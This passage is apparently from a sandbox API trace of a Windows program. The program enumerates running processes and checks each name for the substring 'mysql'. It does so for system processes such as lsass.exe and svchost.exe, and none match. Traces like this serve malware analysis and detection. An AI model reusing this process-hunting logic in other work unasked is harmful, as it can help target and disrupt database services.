| out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0091.435] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="[System Process]", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0091.436] LocalAlloc (uFlags=0x40, uBytes=0x11) returned 0x355b998 [0091.436] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="[System Process]", cchWideChar=-1, lpMultiByteStr=0x355b998, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="[System Process]", lpUsedDefaultChar=0x0) returned 17 [0091.436] lstrcpyA (in: lpString1=0x567fabc, lpString2="[System Process]" | out: lpString1="[System Process]") returned="[System Process]" [0091.436] StrStrIA (lpFirst="[System Process]", lpSrch="mysql") returned 0x0 [0091.436] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6b, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0091.437] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="System", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 7 [0091.437] LocalAlloc (uFlags=0x40, uBytes=0x7) returned 0x3547898 [0091.437] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="System", cchWideChar=-1, lpMultiByteStr=0x3547898, cbMultiByte=7, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="System", lpUsedDefaultChar=0x0) returned 7 [0091.437] lstrcpyA (in: lpString1=0x567fabc, lpString2="System" | out: lpString1="System") returned="System" [0091.437] StrStrIA (lpFirst="System", lpSrch="mysql") returned 0x0 [0091.437] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x140, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0091.439] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="smss.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 9 [0091.439] LocalAlloc (uFlags=0x40, uBytes=0x9) returned 0x3541628 [0091.439] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="smss.exe", cchWideChar=-1, lpMultiByteStr=0x3541628, cbMultiByte=9, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="smss.exe", lpUsedDefaultChar=0x0) returned 9 [0091.439] lstrcpyA (in: lpString1=0x567fabc, lpString2="smss.exe" | out: lpString1="smss.exe") returned="smss.exe" [0091.439] StrStrIA (lpFirst="smss.exe", lpSrch="mysql") returned 0x0 [0091.439] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x198, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x18c, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0091.440] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="csrss.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0091.440] LocalAlloc (uFlags=0x40, uBytes=0xa) returned 0x3541838 [0091.440] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="csrss.exe", cchWideChar=-1, lpMultiByteStr=0x3541838, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="csrss.exe", lpUsedDefaultChar=0x0) returned 10 [0091.440] lstrcpyA (in: lpString1=0x567fabc, lpString2="csrss.exe" | out: lpString1="csrss.exe") returned="csrss.exe" [0091.440] StrStrIA (lpFirst="csrss.exe", lpSrch="mysql") returned 0x0 [0091.440] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x18c, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0091.442] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="wininit.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0091.442] LocalAlloc (uFlags=0x40, uBytes=0xc) returned 0x3541700 [0091.442] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="wininit.exe", cchWideChar=-1, lpMultiByteStr=0x3541700, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="wininit.exe", lpUsedDefaultChar=0x0) returned 12 [0091.442] lstrcpyA (in: lpString1=0x567fabc, lpString2="wininit.exe" | out: lpString1="wininit.exe") returned="wininit.exe" [0091.442] StrStrIA (lpFirst="wininit.exe", lpSrch="mysql") returned 0x0 [0091.442] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1d4, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0091.443] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="csrss.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0091.443] LocalAlloc (uFlags=0x40, uBytes=0xa) returned 0x35416d0 [0091.444] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="csrss.exe", cchWideChar=-1, lpMultiByteStr=0x35416d0, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="csrss.exe", lpUsedDefaultChar=0x0) returned 10 [0091.444] lstrcpyA (in: lpString1=0x567fabc, lpString2="csrss.exe" | out: lpString1="csrss.exe") returned="csrss.exe" [0091.444] StrStrIA (lpFirst="csrss.exe", lpSrch="mysql") returned 0x0 [0091.444] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x220, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x1d4, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0091.445] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="winlogon.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0091.445] LocalAlloc (uFlags=0x40, uBytes=0xd) returned 0x3541670 [0091.445] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="winlogon.exe", cchWideChar=-1, lpMultiByteStr=0x3541670, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="winlogon.exe", lpUsedDefaultChar=0x0) returned 13 [0091.445] lstrcpyA (in: lpString1=0x567fabc, lpString2="winlogon.exe" | out: lpString1="winlogon.exe") returned="winlogon.exe" [0091.445] StrStrIA (lpFirst="winlogon.exe", lpSrch="mysql") returned 0x0 [0091.445] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x23c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x1dc, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0091.447] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="services.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0091.447] LocalAlloc (uFlags=0x40, uBytes=0xd) returned 0x35417c0 [0091.447] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="services.exe", cchWideChar=-1, lpMultiByteStr=0x35417c0, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="services.exe", lpUsedDefaultChar=0x0) returned 13 [0091.447] lstrcpyA (in: lpString1=0x567fabc, lpString2="services.exe" | out: lpString1="services.exe") returned="services.exe" [0091.447] StrStrIA (lpFirst="services.exe", lpSrch="mysql") returned 0x0 [0091.447] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x244, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1dc, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0091.448] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="lsass.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0091.448] LocalAlloc (uFlags=0x40, uBytes=0xa) returned 0x3541688 [0091.448] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="lsass.exe", cchWideChar=-1, lpMultiByteStr=0x3541688, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="lsass.exe", lpUsedDefaultChar=0x0) returned 10 [0091.449] lstrcpyA (in: lpString1=0x567fabc, lpString2="lsass.exe" | out: lpString1="lsass.exe") returned="lsass.exe" [0091.449] StrStrIA (lpFirst="lsass.exe", lpSrch="mysql") returned 0x0 [0091.449] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1c, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0091.450] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="svchost.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0091.450] LocalAlloc (uFlags=0x40, uBytes=0xc) returned 0x35416a0 [0091.450] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="svchost.exe", cchWideChar=-1, lpMultiByteStr=0x35416a0, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 12 [0091.450] lstrcpyA (in: lpString1=0x567fabc, lpString2="svchost.exe" | out: lpString1="svchost.exe") returned="svchost.exe" [0091.450] StrStrIA (lpFirst="svchost.exe", lpSrch="mysql") returned 0x0 [0091.450] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x220, pcPriClassBase=8, dwFlags=0x0, szExeFile="fontdrvhost.exe")) returned 1 [0091.451] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="fontdrvhost.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0091.452] LocalAlloc (uFlags=0x40, uBytes=0x10) returned 0x3541808 [0091.452] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="fontdrvhost.exe", cchWideChar=-1, lpMultiByteStr=0x3541808, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="fontdrvhost.exe", lpUsedDefaultChar=0x0) returned 16 [0091.452] lstrcpyA (in: lpString1=0x567fabc, lpString2="fontdrvhost.exe" | out: lpString1="fontdrvhost.exe") returned="fontdrvhost.exe" [0091.452] StrStrIA (lpFirst="fontdrvhost.exe", lpSrch="mysql") returned 0x0 [0091.452] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1dc, pcPriClassBase=8, dwFlags=0x0, szExeFile="fontdrvhost.exe")) returned 1 [0091.453] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="fontdrvhost.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0091.453] LocalAlloc (uFlags=0x40, uBytes=0x10) returned 0x3541820 [0091.453] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="fontdrvhost.exe", cchWideChar=-1, lpMultiByteStr=0x3541820, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="fontdrvhost.exe", lpUsedDefaultChar=0x0) returned 16 [0091.453] lstrcpyA (in: lpString1=0x567fabc, lpString2="fontdrvhost.exe" | out: lpString1="fontdrvhost.exe") returned="fontdrvhost.exe" [0091.453] StrStrIA (lpFirst="fontdrvhost.exe", lpSrch="mysql") returned 0x0 [0091.453] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x304, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x16, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0091.454] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="svchost.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0091.454] LocalAlloc (uFlags=0x40, uBytes=0xc) returned 0x3541718 [0091.455] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="svchost.exe", cchWideChar=-1, lpMultiByteStr=0x3541718, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 12 [0091.455] lstrcpyA (in: lpString1=0x567fabc, lpString2="svchost.exe" | out: lpString1="svchost.exe") returned="svchost.exe" [0091.455] StrStrIA (lpFirst="svchost.exe", lpSrch="mysql") returned 0x0 [0091.455] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x370, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x220, pcPriClassBase=13, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0091.693] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="dwm.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8 [0091.693] LocalAlloc (uFlags=0x40, uBytes=0x8) returned 0x3547748 [0091.693] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="dwm.exe", cchWideChar=-1, lpMultiByteStr=0x3547748, cbMultiByte=8, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="dwm.exe", lpUsedDefaultChar=0x0) returned 8 [0091.693] lstrcpyA (in: lpString1=0x567fabc, lpString2="dwm.exe" | out: lpString1="dwm.exe") returned="dwm.exe" [0091.693] StrStrIA (lpFirst="dwm.exe", lpSrch="mysql") returned 0x0 [0091.693] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x60, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0091.694] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="svchost.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0091.694] LocalAlloc (uFlags=0x40, uBytes=0xc) returned 0x3541730 [0091.694] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="svchost.exe", cchWideChar=-1, lpMultiByteStr=0x3541730, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 12 [0091.694] lstrcpyA (in: lpString1=0x567fabc, lpString2="svchost.exe" | out: lpString1="svchost.exe") returned="svchost.exe" [0091.694] StrStrIA (lpFirst="svchost.exe", lpSrch="mysql") returned 0x0 [0091.694] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1b, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0091.703] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="svchost.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0091.703] LocalAlloc (uFlags=0x40, uBytes=0xc) returned 0x3541790 [0091.703] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="svchost.exe", cchWideChar=-1, lpMultiByteStr=0x3541790, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 12 [0091.703] lstrcpyA (in: lpString1=0x567fabc, lpString2="svchost.exe" | out: lpString1="svchost.exe") returned="svchost.exe" [0091.703] StrStrIA (lpFirst="svchost.exe", lpSrch="mysql") returned 0x0 [0091.703] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0091.704] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="svchost.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0091.704] LocalAlloc (uFlags=0x40, uBytes=0xc) returned 0x35417a8 [0091.704] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="svchost.exe", cchWideChar=-1, lpMultiByteStr=0x35417a8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 12 [0091.704] lstrcpyA (in: lpString1=0x567fabc, lpString2="svchost.exe" | out: lpString1="svchost.exe") returned="svchost.exe" [0091.704] StrStrIA (lpFirst="svchost.exe", lpSrch="mysql") returned 0x0 [0091.704] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x11, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0091.706] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="svchost.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0091.706] LocalAlloc (uFlags=0x40, uBytes=0xc) returned 0x35417d8 [0091.706] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="svchost.exe", cchWideChar=-1, lpMultiByteStr=0x35417d8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 12 [0091.706] lstrcpyA (in: lpString1=0x567fabc, lpString2="svchost.exe" | out: lpString1="svchost.exe") returned="svchost.exe" [0091.706] StrStrIA (lpFirst="svchost.exe", lpSrch="mysql") returned 0x0 [0091.707] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x350, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x22, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0091.708] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="svchost.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0091.708] LocalAlloc (uFlags=0x40, uBytes=0xc) returned 0x35415e0 [0091.709] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="svchost.exe", cchWideChar=-1, lpMultiByteStr=0x35415e0, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 12 [0091.709] lstrcpyA (in: lpString1=0x567fabc, lpString2="svchost.exe" | out: lpString1="svchost.exe") returned="svchost.exe" [0091.709] StrStrIA (lpFirst="svchost.exe", lpSrch="mysql") returned 0x0 [0091.709] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x434, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1c, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0091.710] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="svchost.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0091.710] LocalAlloc (uFlags=0x40, uBytes=0xc) returned 0x3541850 [0091.710] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="svchost.exe", cchWideChar=-1, lpMultiByteStr=0x3541850, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 12 [0091.710] lstrcpyA (in: lpString1=0x567fabc, lpString2="svchost.exe" | out: lpString1="svchost.exe") returned="svchost.exe" [0091.710] StrStrIA (lpFirst="svchost.exe", lpSrch="mysql") returned 0x0 [0091.710] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x554, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0091.711] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="svchost.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0091.711] LocalAlloc (uFlags=0x40, uBytes=0xc) returned 0x3541580 [0091.711] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="svchost.exe", cchWideChar=-1, lpMultiByteStr=0x3541580, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 12 [0091.711] lstrcpyA (in: lpString1=0x567fabc, lpString2="svchost.exe" | out: lpString1="svchost.exe") returned="svchost.exe" [0091.712] StrStrIA (lpFirst="svchost.exe", lpSrch="mysql") returned 0x0 [0091.712] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x590, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0091.713] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="svchost.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0091.713] LocalAlloc (uFlags=0x40, uBytes=0xc) returned 0x3541aa8 [0091.713] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="svchost.exe", cchWideChar=-1, lpMultiByteStr=0x3541aa8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 12 [0091.713] lstrcpyA (in: lpString1=0x567fabc, lpString2="svchost.exe" | out: lpString1="svchost.exe") returned="svchost.exe" [0091.713] StrStrIA (lpFirst="svchost.exe", lpSrch="mysql") returned 0x0 [0091.713] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x598, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0091.715] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="svchost.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0091.715] LocalAlloc (uFlags=0x40, uBytes=0xc) returned 0x3541910 [0091.715] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="svchost.exe", cchWideChar=-1, lpMultiByteStr=0x3541910, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 12 [0091.715] lstrcpyA (in: lpString1=0x567fabc, lpString2="svchost.exe" | out: lpString1="svchost.exe") returned="svchost.exe" [0091.715] StrStrIA (lpFirst="svchost.exe", lpSrch="mysql") returned 0x0 [0091.715] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0091.716] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="svchost.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, 